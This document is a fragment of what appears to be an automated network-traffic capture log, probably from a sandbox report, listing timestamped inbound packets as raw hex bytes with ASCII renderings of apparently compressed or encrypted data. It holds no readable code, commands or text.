6f cc 7f f9 5e fa 7f f9 5e c6 7f f9 5e e6 7f f9 9e bf Data Ascii: ^xtb2I$Nq0(eL5Tyg25al\oAf2<xkR[Pz(w%oWmL`x,Iwy:o>O`F ;/]=A2*wBq'{c<=I}y#rNsym})5_&{h"Yt_7\|o^^^
2023-11-18 09:02:40 UTC	7180	IN	Data Raw: 24 1e 25 bf 77 2c fb 29 9b 75 0c d9 45 92 c4 ef 3a 70 5e 6b e7 1c 27 31 6d 9b cb 7d c1 49 dc bf d5 e3 64 ee 15 6b 79 f6 aa e1 5e 8e 69 0f d3 2c a6 b9 61 9e bb 98 76 30 ed 26 26 b3 4c f7 51 2e a9 7d 36 f7 72 55 2c 53 e1 92 ba aa 59 8e f9 5e e6 25 ca 48 4c b3 48 97 b0 8c c4 b4 83 65 3a 99 af 14 9f 41 a8 a3 2d 90 4e a4 ad 4c bb a7 83 69 fb c4 5d a4 b6 9b d8 f6 5b 76 91 7a 6f a5 ff 98 ca 37 93 b6 ed 2a b5 39 f0 2f cb ed a0 9c 7d 57 9e 2b b9 67 24 9d c5 b4 6b 27 b1 63 c9 1f cd 7d 63 36 f7 8a 47 93 57 b8 ab 24 e5 50 6e 38 f7 99 e4 49 47 11 5b c5 f9 e4 2a 8b 54 d2 e0 94 24 ce 6d f2 3a ce e9 6b 38 bf 70 fd 6d e7 ba 9a fb e1 ae 52 f4 bd 5d a5 6e a6 95 ef 72 5f fa 0e cb 6c e1 fe f3 1b d2 3f 51 07 3a 99 2f d9 ca 7c 0f b1 4f 58 1f d3 de 6d 2c f3 0b e5 3f 65 fa 35 d3 Data Ascii: $%w,)uE:p^k'1m}Idky^i,av0&&LQ.}6rU,SY^%HLHe:A-NLi][vzo79/}W+g$k'c}c6GW$Pn8IG[T$m:k8pmR]nr_l?Q:/\|OXm,?e5
2023-11-18 09:02:40 UTC	7196	IN	Data Raw: ef 07 de 0f bd 1f 79 3f f6 7e e2 ed f1 7e ea fd cc fb b9 f7 0b ef 97 de af bc 5f 7b b7 7a bf f1 7e eb fd ce fb bd f7 07 ef 8f de 9f bc bd de 9f bd bf 78 7f f5 6e f3 fe e6 fd dd fb 87 f7 4f ef 5f de bf bd ff 78 b7 7b ff f5 ee f0 ee f4 4a 3e 8b cf ea b3 f9 ec 3e 87 cf e9 73 f9 dc 3e 8f cf eb f3 f9 fc be 80 2f e8 0b f9 64 5f 3f 5f 7f df 00 df 40 df 20 df 2e be 5d 7d bb f9 06 fb 86 f8 76 f7 ed e1 db d3 b7 97 6f 6f 5f 96 6f 1f df be be fd 7c 43 7d c3 7c fb fb 0e f0 1d e8 3b c8 77 b0 ef 10 df a1 be c3 7c 87 fb 8e f0 65 fb 86 fb 72 7c 23 7c 23 7d a3 7c a3 7d 63 7c 63 7d e3 7c 47 fa 8e f2 1d ed 3b c6 77 ac 6f bc 2f d7 97 e7 9b e0 cb f7 15 f8 0a 7d 13 7d 93 7c 93 7d 45 be e3 7c 53 7c 53 7d d3 7c c5 be e9 be 12 df f1 be 52 5f 99 af dc 37 c3 37 d3 37 cb 37 db 37 c7 Data Ascii: y?~~_{z~xnO_x{J>>s>/d_?_@ .]}voo_o\|C}\|;w\|er\|#\|#}\|}c\|c}\|G;wo/}}\|}E\|S\|S}\|R_77777
2023-11-18 09:02:40 UTC	7212	IN	Data Raw: 2e ed 63 fc 9b 9c 2c d3 19 86 e3 20 e3 74 69 08 eb 8f 87 8c 13 66 66 38 7e 5c c4 7f 0e 58 7c d0 ad 2c 6f 62 fc 4d db 44 6c 42 de a4 c4 fb ba da 80 21 5f bd 05 8d a7 c5 67 5f d3 ef e9 1a 83 91 58 46 48 b3 ac fa d3 46 b5 b5 da 24 4f 69 91 45 e2 4b af 89 98 68 9e a1 05 89 50 e2 65 ff ec 8a e8 58 f1 13 21 7d 65 2e a8 51 c6 9a 67 aa ef 75 f4 95 d5 d2 d0 47 8e 5a 61 f2 83 b6 c6 32 da 3e 48 c6 d4 e7 35 f5 57 23 fa ca 50 4c 73 4c 37 2b 9e 63 b6 4d f1 c7 c2 aa ba b0 79 6d f1 1b e1 8c 8c e1 a6 9d 10 cf c8 ec 82 7a f5 6f 5d d6 c7 8f c9 cc 2c 93 70 e6 5e d3 ec 7e f1 0e 72 7e 59 89 f8 34 ba 78 39 5b 1b d6 b6 4a a4 eb 5a 22 e1 a6 da 86 a5 4d 26 65 75 79 e2 05 bc 3e f3 c4 cb 7d 9a 4c f1 41 00 4d b2 a1 99 47 0e 31 fe 6a b5 51 d1 a5 c6 74 aa 8b e3 63 22 99 4a 7e 24 5b d1 Data Ascii: .c, tiff8~\X\|,obMDlB!_g_XFHF$OiEKhPeX!}e.QguGZa2>H5W#PLsL7+cMymzo],p^~r~Y4x9[JZ"M&euy>}LAMG1jQtc"J~$[
2023-11-18 09:02:40 UTC	7228	IN	Data Raw: 1b 9a 8f 99 81 d6 9d 56 27 7b b6 dd c6 49 87 ce 4c 74 df 72 bb 7b af 72 9d ed 1b bb 48 31 57 ec 0c fe 8a 45 76 6f 43 16 e5 aa bf a8 7d c9 57 b6 90 ed 1b 73 57 9c aa 3c aa 3e a4 9d d0 4f 92 29 76 19 b4 69 23 be fe 7c 85 38 43 4c 65 09 5f d8 88 c7 6e 37 d2 db bc df 7b 18 8c 5b 07 8d d7 88 e7 87 27 26 8b 07 c4 2a a8 c0 3b a4 42 a9 42 4a 94 7f 90 65 25 11 31 cc b4 94 ef 33 ad 32 4f 98 6c f5 e2 b4 45 ed 66 ce ab d0 da e3 dc 24 28 ca c5 6e ae bb c5 7d ce 7d 09 0c 7c 1c be f1 3b f8 79 56 7f 8f f4 ae f7 46 02 4b 26 79 0b bd bb 30 c7 9b bc 17 bc 3d de 11 ef 7d a6 85 6a f1 be 7e 4c 37 37 13 db 88 bd 45 59 8c 86 87 98 2c de 2e 2e 16 97 8b 8f 8a 4f 89 2f 89 7b c5 e3 e2 29 f8 e3 9f c4 1e 52 a4 14 25 0d 92 a6 48 a9 d2 02 68 a5 8d 52 be b4 53 7a 19 8c f2 a1 f4 8d 74 4e Data Ascii: V'{ILtr{rH1WEvoC}WsW<>O)vi#\|8CLe_n7{['&*;BBJe%132OlEf$(n}}\|;yVFK&y0=}j~L77EY,..O/{)R%HhRSztN
2023-11-18 09:02:40 UTC	7244	IN	Data Raw: a8 d3 18 88 fe b3 3c 12 18 fe ac 52 a7 f4 c2 3b c5 6b 59 5a 81 66 e9 e3 f5 2f f5 49 c6 43 c6 23 c6 2f c6 48 72 84 9c 21 f7 d2 17 69 27 f3 46 73 8a b9 d5 dc 67 5e 6b 4d b4 de 44 dc 36 b1 5b db c3 ed 31 76 3e b8 ef 3d 70 df 97 40 b8 5c e7 31 68 a0 0f 9c 95 ee 3b 18 23 41 0c e1 e7 76 07 8a a9 62 01 a2 eb 46 29 0b a3 7f ad 3c 51 7e 58 2e 97 5b 20 7b 17 29 3b 94 08 bc f7 02 b5 12 cc 10 aa c5 6b 2f 6a 54 7f 51 a7 78 ff 22 a3 09 89 24 83 f0 fe bd e8 18 ba 16 68 17 68 c6 98 33 f1 49 cb cc 1f a0 d1 e3 ac b1 f0 28 ef 02 b3 86 db df db 11 bc 5a da de 1d e8 16 b8 8d bc 51 de 64 6f b9 57 c4 cf 34 0b 11 aa 71 0d c3 a5 0f a5 4f 31 4b 2d e4 5b 81 b4 5f c9 c1 0a 55 06 2a 13 95 f9 70 03 eb 95 7c f0 d6 55 6a 1f e0 e3 00 f5 16 b8 d2 45 40 8d 0a d5 5f eb a9 29 40 8c 99 da 7c Data Ascii: <R;kYZf/IC#/Hr!i'Fsg^kMD6[1v>=p@\1h;#AvbF)<Q~X.[ {);k/jTQx"$hh3I(ZQdoW4qO1K-[_U*p\|UjE@_)@\|
2023-11-18 09:02:40 UTC	7260	IN	Data Raw: 64 45 d2 35 d2 b0 a6 3a c9 b4 ae af 93 3a 23 24 8f ea ed 6e 96 17 7b 82 3b a3 24 2f b8 ac 91 c9 97 f4 a2 56 29 d3 a5 b6 8b 59 cc d9 8b e5 a5 2a 24 7e 55 ab 1a 15 14 dc 4d c5 98 cb 59 e5 a5 0a d4 0e 14 dc 43 25 61 0e 7a d1 a0 6b d5 95 d2 7c b9 88 82 67 53 a0 83 23 42 c3 cc ac d4 80 bd 14 e0 38 92 af ab 46 dd 47 a1 7e 0a ad 1a f9 1c 0a 6d a2 50 7d f4 73 a9 74 88 ab 94 ab 79 3b 7f d8 d0 88 07 50 70 3f 15 8f 70 a6 91 d3 3d e2 f3 a8 f8 54 6a eb 82 a5 67 b4 6c 3e 97 b7 ab 28 f8 d9 28 f1 f1 0e ae 41 78 80 0a cf e0 2a 5a a6 aa 55 2c 23 63 64 0d 10 9f 4f c5 67 72 15 62 97 36 0f f3 aa e8 19 03 05 2f a0 f2 b3 38 b3 91 7e 21 15 7f 86 33 57 d1 2f a2 f2 9d 5c 85 da 06 0e a8 82 81 17 53 e1 2e ce f4 0a 3f 47 85 bb 21 f8 24 7c 21 7c 1a 4d 84 0b e9 e7 55 41 52 a7 c3 b5 c8 Data Ascii: dE5::#$n{;$/V)Y$~UMYC%azk\|gS#B8FG~mP}sty;Pp?p=Tjgl>((AxZU,#cdOgrb6/8~!3W/\S.?G!$\|!\|MUAR
2023-11-18 09:02:40 UTC	7276	IN	Data Raw: d0 e7 2e 8a 37 80 0c e8 73 4f 4d 04 09 d0 e7 9e 36 71 95 2d 09 22 a0 cf 5d dc bb 29 07 c2 ff c1 27 a0 fb 14 9e bd d7 80 3e f7 d4 39 a7 d0 57 ac 17 0d 59 f9 23 7b e8 48 14 68 c1 2a 34 ed e0 40 4a e1 8b df ca 2c 5c 69 57 1f 0d 77 8f 22 3b 11 99 3e 6f d1 d0 e9 56 b1 b0 dc a9 6d 0b cf 6e ca 33 46 e9 af f9 c2 0a a7 87 4e 5a e5 69 6c 7a 25 9b 76 c3 91 bb 14 d1 ae 79 db c2 2a 27 4f 6b 55 1e 73 37 29 fc 86 af a5 31 77 6c 8f 4e 63 ee a2 5d a6 96 c6 dc d1 c9 42 2d 8d b9 9b 54 8c 76 6d 7a 88 4d 2d c6 87 28 b2 dc 24 e6 ee 65 9a af 47 05 97 12 02 d1 92 2e fa ff f9 d9 b4 c0 9e 8a 43 67 b3 d2 99 b4 c4 08 81 68 15 2b ad 0f ff d4 33 d2 f1 66 70 5d 9b 8e c7 75 73 3a 5e e4 d1 a6 e3 45 8a 39 1d 2f 92 5b a6 e3 71 97 21 1d 8f 1b 32 d3 f1 cc 36 90 8e c7 4d ed a5 e3 71 7f 9b e9 Data Ascii: .7sOM6q-"])'>9WY#{Hh4@J,\iWw";>oVmn3FNZilz%vy'OkUs7)1wlNc]B-TvmzM-($eG.Cgh+3fp]us:^E9/[q!26Mq
2023-11-18 09:02:40 UTC	7292	IN	Data Raw: 3d b8 a5 81 d5 18 46 ce b5 1e 7c a0 0e 1f ac 94 98 b8 d6 83 1a e5 0f 46 4a 4c 5c eb c1 6a 1a bd 0c 69 e9 d5 15 7c df 24 23 04 e3 7a 30 45 4b 6e e0 ce 5b f8 7e 9c 04 31 88 d5 83 93 44 98 12 2b e3 7a b0 59 14 2e 31 33 ae 07 cf a3 91 15 32 de b0 cf a6 f1 5b 24 bb c4 b8 1e bc 90 96 2b 05 b2 0b a9 d5 83 f3 cd 56 9d 71 3d 78 a9 cd 2c 18 d7 83 8b ed 0e ce b8 1e ec 14 8e 58 96 71 3d d4 54 8a e3 5d 9a 4e f3 84 86 95 4b ba d3 98 ed a8 95 af 49 60 06 e4 f5 7b 17 76 98 7d 7a 8e 64 45 fc 53 7c 62 ea b9 16 00 aa 04 e8 c8 ac 49 83 bb 2a 71 38 49 88 67 77 12 9f f6 98 bc 24 44 6b 7c a9 14 21 11 3c a1 49 3f 5e b8 24 d2 ce b3 32 53 81 21 28 d4 10 59 86 ef d9 d3 da ea 91 28 29 40 fa a1 b1 08 1f 45 c1 cc 60 51 a6 1e 84 c0 a5 58 17 96 4b f3 25 42 fb d7 22 dc eb f9 39 34 a9 4c Data Ascii: =F\|FJL\ji\|$#z0EKn[~1D+zY.132[$+Vq=x,Xq=T]NKI`{v}zdES\|bI*q8Igw$Dk\|!<I?^$2S!(Y()@E`QXK%B"94L
2023-11-18 09:02:40 UTC	7308	IN	Data Raw: 06 e9 c1 69 5c d7 bf d9 84 ad 9e b3 c6 d1 df 32 a7 e3 37 66 78 6e dd 04 ae d9 cd 3c f2 ed 16 e2 99 79 e6 1f 4e 26 3f b5 33 ff fb 64 32 53 23 fd 4f 0b 91 70 37 e7 a7 07 58 3a df 69 85 2e 45 54 fa ff 9e 4c 3d 98 93 bf 7b 32 b5 60 51 fe d8 42 14 71 74 14 66 b4 c4 2c ac 92 f0 0c c7 d9 7a 1a f0 64 07 03 71 92 fe f7 90 0a d7 67 96 93 89 3f 1d c4 25 3e 1d 30 d6 16 e2 45 a7 f0 1c cf 04 ec 21 3f 2b d2 87 51 c3 5a d8 fe 3f a9 71 b5 b1 bf 97 74 b8 5a 39 de 4b 7c 2e 7f a7 79 7c 35 2a 4d 07 e3 c7 25 9c 9f 3a 9a b3 e9 7c a6 2c bb 3a 4f 94 70 84 6d df fc 9a e6 10 9a c7 1a 0f 8a 81 78 34 1a e6 a3 74 f5 37 9e 5b 95 06 27 ce 55 4d 48 78 de 34 16 03 cf 87 24 ce 6e 73 26 4c a9 89 b8 04 2b d3 20 6b 49 d4 31 56 f7 1b 17 ca fe 68 34 84 25 55 c7 bd 8b e7 d0 0d a0 ba 1b 8c 46 94 Data Ascii: i\27fxn<yN&?3d2S#Op7X:i.ETL={2`QBqtf,zdqg?%>0E!?+QZ?qtZ9K\|.y\|5*M%:\|,:Opmx4t7['UMHx4$ns&L+ kI1Vh4%UF
2023-11-18 09:02:40 UTC	7324	IN	Data Raw: 64 60 0c ab 3a 6b 7d bd ef 6c 0a 21 37 25 b0 e6 b5 80 36 a8 85 74 ec a4 ad 67 c4 7a d6 46 d6 26 a8 da 49 91 1d 30 9f a0 f1 fa 04 69 ea 5a 00 c0 7a 00 7e 03 c0 fd 4a 60 27 00 bf 4c 86 7e dc 57 26 37 4a 49 fd 43 19 eb f5 f5 ac 8d 45 27 2a 63 21 f9 db 12 79 6e 62 80 3c ff 2f 52 ce 32 40 59 9d cd 52 75 16 eb 75 27 d7 d6 fb b6 d0 0b c0 cb 93 58 75 16 ab aa b3 98 55 e7 3f 41 94 5f 6f 90 ab b3 54 55 9d a5 aa ea 2c 65 d5 59 75 0f 21 e3 ef 91 aa f3 c3 b5 58 9d c7 b0 3a ad fa 88 c1 49 52 75 de 05 f8 5b ee 91 aa f3 0d f0 1c bb 47 aa ce 1f c0 f3 ef 7b a4 ea 4c fa 3d cc 77 e0 86 1f 53 56 67 5e ff d5 59 b6 8e 49 ba 3c c9 2f 33 59 c6 93 d6 31 a1 cd 48 52 c8 78 fe 3a 26 e3 ae 24 95 8c f3 7b 24 f2 70 e2 94 a4 59 a4 d3 ad 5a 55 ef fb 03 95 e6 97 c9 4c 9a 45 ba 9c 20 69 16 Data Ascii: d`:k}l!7%6tgzF&I0iZz~J`'L~W&7JICE'*c!ynb</R2@YRuu'XuU?A_oTU,eYu!X:IRu[G{L=wSVg^YI</3Y1HRx:&${$pYZULE i
2023-11-18 09:02:40 UTC	7340	IN	Data Raw: b0 b2 a5 47 57 40 f7 13 74 43 0d 20 42 8a 80 fc 6a 94 14 f3 47 01 a9 24 a8 3b a0 4f 47 d3 30 7d 34 e2 c7 aa 88 52 2e cc 37 c7 d0 db 02 b9 34 63 e1 52 69 27 a0 57 8d a5 b1 3a b9 34 2c a2 e0 35 14 a5 3e e0 43 a8 03 e8 42 2e 8d bf 13 94 e6 00 cb 1a 27 85 4e 2e 6d 0e 21 79 40 fe 48 d2 7d 40 02 84 14 02 e9 3a 5e 8a d3 40 70 05 ec a1 14 dd 27 48 b1 67 3c 10 ba 87 d2 1e 80 1e 9d 28 c5 9f 26 02 52 1f 14 4a 7b 01 fd 88 90 97 80 62 83 4a 69 5f 40 6b 2e 91 e2 26 72 69 2b f8 b3 40 e9 00 80 7b 09 d8 01 70 ac 90 3d 5d a8 60 57 4d 92 62 26 b9 b4 f0 37 8a 9e 5c f3 76 11 f8 0c 14 cb 08 49 77 53 3e 3f 54 2b c5 b5 b5 c8 05 21 cb 9c 5d c8 e6 d8 64 29 9e 98 0c 84 b2 af 2c 01 d0 cf 2f 95 e2 27 97 e2 e6 85 ec cd 99 b7 83 a4 17 2f 55 c5 63 5a cf 52 ce a5 34 75 aa 14 c3 c9 a5 b7 Data Ascii: GW@tC BjG$;OG0}4R.74cRi'W:4,5>CB.'N.m!y@H}@:^@p'Hg<(&RJ{bJi_@k.&ri+@{p=]`WMb&7\vIwS>?T+!]d),/'/UcZR4u
2023-11-18 09:02:40 UTC	7356	IN	Data Raw: 83 1a 27 41 a9 d2 fa 0a a4 06 0d 5b 55 69 7d 2f aa 55 d1 aa 4a eb 3b e5 a2 20 fd b3 55 ff 58 17 65 35 55 69 fd 5f a7 ed b4 2a ad ff 5d 0b 62 7e 3a e8 3f d3 6d 0d 64 06 f9 7f 89 35 13 55 5a ff a8 9b 32 72 aa b4 fe cf fe 3f 7b 57 1a 63 c9 75 95 eb 75 f7 eb ee e9 d7 ef 75 d5 7b 55 af ea be a5 df eb 7d df 5f f7 f4 2c 9e 7d 1f 8f 97 89 1d 4f 20 ce c4 b3 d8 9e cc c4 1e cd 4c 6c 93 20 61 0c 22 38 02 14 12 3b 26 20 40 01 14 c7 c2 89 b0 2d 82 13 41 64 85 1f 2c 11 08 85 58 c8 02 81 94 88 c8 02 92 40 40 18 07 11 51 b7 6e dd aa 73 ce bd 55 dd 3d 5e 32 f1 4c cb b3 dd ef d4 76 cf 39 df 3d f7 d6 ad cf 10 d4 a8 d2 9a af 43 03 29 3d 6b 9e ca c6 ad 58 95 d6 7c 0e 40 8a 2a ad 59 e8 04 28 54 a5 35 4f 51 24 54 a5 35 ff 05 02 8a 2a ad 79 b1 0b c2 61 63 ad 1b 34 2a 8a b2 e6 c8 Data Ascii: 'A[Ui}/UJ; UXe5Ui_]b~:?md5UZ2r?{Wcuuu{U}_,}O Ll a"8;& @-Ad,X@@QnsU=^2Lv9=C)=kX\|@Y(T5OQ$T5yac4
2023-11-18 09:02:40 UTC	7372	IN	Data Raw: d6 94 ce 5a 7f 09 a3 71 e6 28 a2 56 74 a1 a3 a5 39 86 d6 6b fe 71 a0 b5 ed ff 0c 5a 1f 3e ec 41 2b c0 75 0f 0d f3 3e 1d 84 bc a7 97 fc 55 e0 fa 6c 51 70 7d 82 46 7b 04 66 83 21 a8 d2 0f ae f3 01 42 87 0a 00 75 54 1e 50 47 f5 07 54 2c 12 27 18 40 ad ee d6 a3 9d ac 8e 91 18 9c 4a 75 11 9c 4e 29 84 d3 13 83 c2 69 93 81 d3 85 06 6e d4 4c 8b 61 34 c3 30 ba dd 0f a3 a5 79 18 ad 00 8c b6 6b fd 05 fa a2 97 cb ee 0f a3 ca 78 44 19 a6 b6 05 c7 5b a7 a4 c7 e2 43 8a eb bb d7 c5 8b b4 5a c5 30 56 26 30 f6 ae 31 80 b1 6b fe ce e6 f8 ef b8 2a 3e 82 05 56 d5 5f 1e 62 58 cd b3 b3 41 6d fb b9 94 81 90 fa 36 6c fb 5d 76 aa 0a 6d fb fb 1d 16 e8 6f e7 7f 13 41 fb 3d 8e 05 2f 35 b4 de 1c 23 e7 26 b4 aa 62 31 77 3d 9c 68 8f b2 d5 6f f6 66 28 ad da 8a 87 38 f9 37 21 2b 95 a2 37 Data Ascii: Zq(Vt9kqZ>A+u>UlQp}F{f!BuTPGT,'@JuN)inLa40ykxD[CZ0V&01k*>V_bXAm6l]vmoA=/5#&b1w=hof(87!+7
2023-11-18 09:02:40 UTC	7388	IN	Data Raw: de 0a 48 09 bb 3a f9 e2 aa 71 f0 2b d9 48 d1 21 ba 7c a6 ae a9 e7 a3 bf 59 a3 aa e4 b5 4d c0 ff 57 41 ff fe 4c 7f 84 64 fb 9d d2 50 e8 66 7a 5d e5 bd 9c dd 12 a7 60 6e ac f6 8a 58 28 10 d8 64 92 6b 29 fd 57 94 6f 4e cc b9 29 38 27 56 7a a3 9a 13 ab 38 14 a2 6c bb 62 a3 e8 77 47 24 56 31 e7 8b b1 d2 39 cf c5 9c 39 cf c7 42 f5 d1 eb 38 3d b8 2e 56 45 41 8a 5e cf f7 bd be 34 3a b7 5f ca bc 68 60 bf 5b 57 e5 ec 96 f7 48 5d 37 a0 ae 9b d4 dc 58 c5 8d 54 57 d5 21 3d 2f 36 6d 73 6c e2 dc d8 b4 06 fe 5d ca bf cb 22 54 c9 17 a9 01 cf 51 79 cf 53 79 5f 8a 85 e6 46 d7 f0 bb 2b f9 57 be b9 da 97 22 bf 8b f8 77 17 ff 7a 63 f0 70 7c 76 cb 44 1e 83 8a ab 31 06 6e fa 6b 94 3e 52 c6 66 45 2c 54 7c 1c 87 51 da 02 0a 5f 4a 36 b5 2c e2 bc d3 0e c4 aa 16 c4 a6 cd 8d 85 06 1b Data Ascii: H:q+H!\|YMWALdPfz]`nX(dk)WoN)8'Vz8lbwG$V199B8=.VEA^4:_h`[WH]7XTW!=/6msl]"TQySy_F+W"wzcp\|vD1nk>RfE,T\|Q_J6,
2023-11-18 09:02:40 UTC	7404	IN	Data Raw: 69 a0 ed 75 43 89 fc 83 7c d4 06 3c 50 81 a9 f4 1c fa eb 18 5c f0 ed b7 83 4d 0a 37 0e 8c 58 22 75 1f 1f c5 be 96 c9 59 e4 10 43 50 9b 9e b6 52 08 4e 8b c5 9e 0f 44 13 70 ee 22 8b 0f a3 9c 1f 5a cb d0 c9 28 f7 a4 6f f9 80 5e 84 bb b1 37 e1 7e 1c 92 e8 f4 de 24 ba 3a 24 46 8d 3e 61 23 76 17 54 09 db 72 38 41 27 f3 b9 ed 7a ff 64 9b ba d4 99 04 e3 d9 7e 82 0f 62 02 db 4f 90 54 53 53 46 92 2f 39 4a bc 82 98 c8 17 91 02 6e 35 64 33 60 a9 61 99 1b f3 97 4a be c8 1e 99 3a cd 64 a3 59 73 64 42 01 b1 81 ed 01 9b 07 89 d7 cd 92 57 b2 47 46 87 f2 a7 e0 e7 0c e1 3c 3b f3 00 ee 22 92 5e ae 93 bd 87 06 70 e7 07 cc 0c 40 e1 cf c7 b4 e0 17 f1 ca 61 71 7f 13 59 bc 6a b2 d6 82 fc ec 38 8a 79 35 55 a0 ef 27 ac 1c cc f4 18 c2 29 42 57 48 f4 a0 a3 ed 89 ef 92 bb 9d 65 06 b8 Data Ascii: iuC\|<P\M7X"uYCPRNDp"Z(o^7~$:$F>a#vTr8A'zd~bOTSSF/9Jn5d3`aJ:dYsdBWGF<;"^p@aqYj8y5U')BWHe
2023-11-18 09:02:40 UTC	7420	IN	Data Raw: f5 11 1f c8 e6 72 57 14 f0 6e 72 34 0c f0 84 49 e7 c8 a8 19 e6 f7 e4 15 0e 20 4a 0c 03 30 6d 40 82 06 d7 17 a5 a9 b8 c7 79 07 2c 78 d6 7b e2 e2 aa a8 25 57 5a 81 9d 84 02 3c 4f b7 31 03 bc 4e 2a d5 eb 3c e8 55 e8 88 58 80 b4 1f 31 69 01 ff 40 9e 1f 01 ce 20 6d 05 44 5a cb 0e 60 3b ca ad e4 5a 8c 21 3e 93 dd 69 0b 0a 60 58 cf a5 21 bc d8 e7 cb 01 80 1f 50 f0 70 d0 e5 79 94 2d 13 a5 9b 8a 51 09 38 8d e6 7e d3 54 04 a3 fe 8f b0 5e 0e f8 06 f5 bf a9 a9 42 5d 45 eb 7d 53 51 15 6c ea 89 60 53 51 15 8c 7a e6 08 1d bc 6e a5 6b f8 3d 66 de 70 15 97 70 15 97 38 1a 37 a0 8e 4b c9 52 b3 d4 11 b6 01 f5 dd c0 f5 dd c0 6c 86 f0 ee 50 3b a6 11 c1 1b 4a 37 a4 d9 67 82 07 4d 7a 83 fe 26 b3 64 42 4e 0b f8 8a 9d 33 bc 55 5a 34 d5 5c 56 e3 5f c7 43 58 31 c5 1e e6 3c 85 62 cc Data Ascii: rWnr4I J0m@y,x{%WZ<O1N*<UX1i@ mDZ`;Z!>i`X!Ppy-Q8~T^B]E}SQl`SQznk=fpp87KRlP;J7gMz&dBN3UZ4\V_CX1<b
2023-11-18 09:02:40 UTC	7436	IN	Data Raw: d8 ce d6 46 d0 ef 29 29 d6 ab b3 a2 cc 8c 69 04 07 ef 8d 3e 5b de 6e 20 82 6f 88 08 aa 21 fb 87 cf 23 35 ba 24 ea f6 ca bb 61 e3 ea a2 55 c3 7f 15 d5 de 2e 5e fb 85 75 5b ab 31 da 40 3e 7b 0d a8 b1 4b a8 51 13 b2 d1 b6 03 9e 5a ba ea ab f1 37 ca a8 73 45 3e 83 58 33 44 3e 83 b8 7b 27 b2 fb 3b 2a 53 5c 7d b9 cd 5e 52 35 93 93 af a9 e4 2c ad ce fe f6 90 5f 9e ae ad 53 bf 18 ea 5c 10 d4 b9 4f c4 1d 03 4e 18 d0 39 3e 85 e9 5c 3e 53 fb 13 a2 d2 2e 07 bd bb bf be ce 69 b0 f1 88 d9 e9 40 90 c1 fb 38 19 05 62 fb 94 93 89 39 74 0e 16 57 75 1a c8 26 51 8e 1d c4 2c ca 59 9e 43 f3 5e 4e 56 81 a8 83 78 39 6b 41 56 8b 72 76 82 a4 88 72 3e cb a1 cd f0 38 f1 11 19 ce cb 89 cb 45 7d a2 9c 1e 20 4d 82 5c 0e e2 6e e4 64 04 88 f3 5a 31 6a 81 d8 c5 55 65 20 87 04 59 92 4b 43 Data Ascii: F))i>[n o!#5$aU.^u[1@>{KQZ7sE>X3D>{';*S\}^R5,_S\ON9>\>S.i@8b9tWu&Q,YC^NVx9kAVrvr>8E} M\ndZ1jUe YKC
2023-11-18 09:02:40 UTC	7452	IN	Data Raw: f2 96 02 5e c6 8d 32 a6 e1 5c 16 40 9c 85 62 2f fc 03 5d 35 52 23 4f 7f 6b 28 ef 85 61 c7 f3 39 6a 2e ce 6f 89 6d 6f 7c 73 a1 ae 4f 82 8b 9e 08 8a 98 8b 0c 03 b9 18 2e 72 31 4a 7b b2 a5 6c a5 de 5b 14 3d 17 f8 09 05 55 31 8d 3a 55 a6 51 e8 09 5b 9b 90 82 bc 92 07 1c 63 b8 e4 17 e7 e5 05 84 14 e7 e5 e4 5a 1d 3c 17 fb 28 cb 42 0e 53 2e ee e7 d9 f9 95 c6 45 33 ed b8 08 ae 33 b5 fd 28 42 69 89 6b 2e 14 75 e9 09 36 45 3b 03 86 9a 8b 2b 0d e4 e2 31 91 8b 31 85 da 5c 34 3f 80 76 dd af 3f 2e da a2 8c a9 38 14 d5 31 85 8d b9 f0 08 a1 c8 2b 0f 72 a1 0c 3a 84 34 e6 e2 21 1e f9 4b 51 b3 7d 1c 97 ab 21 96 c7 79 2e 6e 3c 40 07 da 61 b9 b8 3f b4 3f 4d 55 94 c1 71 cd 85 3d 94 0b 5f d4 71 61 35 90 8b e7 42 b9 18 46 47 12 da 4d 94 d2 1f 2d b5 3e 1e fb 58 22 58 86 96 f5 4a Data Ascii: ^2\@b/]5R#Ok(a9j.omo\|sO.r1J{l[=U1:UQ[cZ<(BS.E33(Bik.u6E;+11\4?v?.81+r:4!KQ}!y.n<@a??MUq=_qa5BFGM->X"XJ
2023-11-18 09:02:40 UTC	7468	IN	Data Raw: 70 1a dd eb 57 c5 98 ea 2d 17 c5 7b a2 ec 97 a6 aa f6 f0 0d 5a 0f 1f 19 37 f9 90 85 e4 8b 45 f2 84 32 f9 6a d4 d4 de de 3c f9 8f 51 26 d0 81 e7 b3 87 12 eb a4 cf 27 b6 1c da 1e 57 e3 78 cf 36 d7 57 3e ad f7 ab f9 54 c4 cd 67 bb 85 7c 26 d5 e6 93 93 e1 ce c9 ce d1 dd c9 3a 82 9a 7a 3b 9b e7 73 8a 7a 66 17 9e 4f a3 e9 74 27 54 9f 4f 6c 39 b4 3d dd 9b fc 92 63 24 2b f9 54 ed e7 77 fa 6c 75 7f e9 d5 42 3e b3 44 3e 79 39 fa 3b 7d ad 50 d3 40 8f f8 f9 68 d7 01 7a a8 75 2f 51 92 55 77 b5 5e 67 2d d4 6b a1 a8 57 a5 e1 35 9b ce a8 97 ed 06 f3 76 ef 85 32 91 fd 86 d9 d8 6e 50 6b 7a 3c 85 3c 19 35 d5 ce 6e b4 56 56 52 e2 7e 4b f4 fb c4 69 2c e5 69 e4 e4 67 f7 e9 a5 fb 0a 03 a5 d1 33 71 2b c7 ca d0 ba 72 53 92 dd ca 1d 2d d4 6b 2d af 57 b9 b1 5e 43 50 2f 5f 46 e2 7a Data Ascii: pW-{Z7E2j<Q&'Wx6W>Tg\|&:z;szfOt'TOl9=c$+TwluB>D>y9;}P@hzu/QUw^g-kW5v2nPkz<<5nVVR~Ki,ig3q+rS-k-W^CP/_Fz
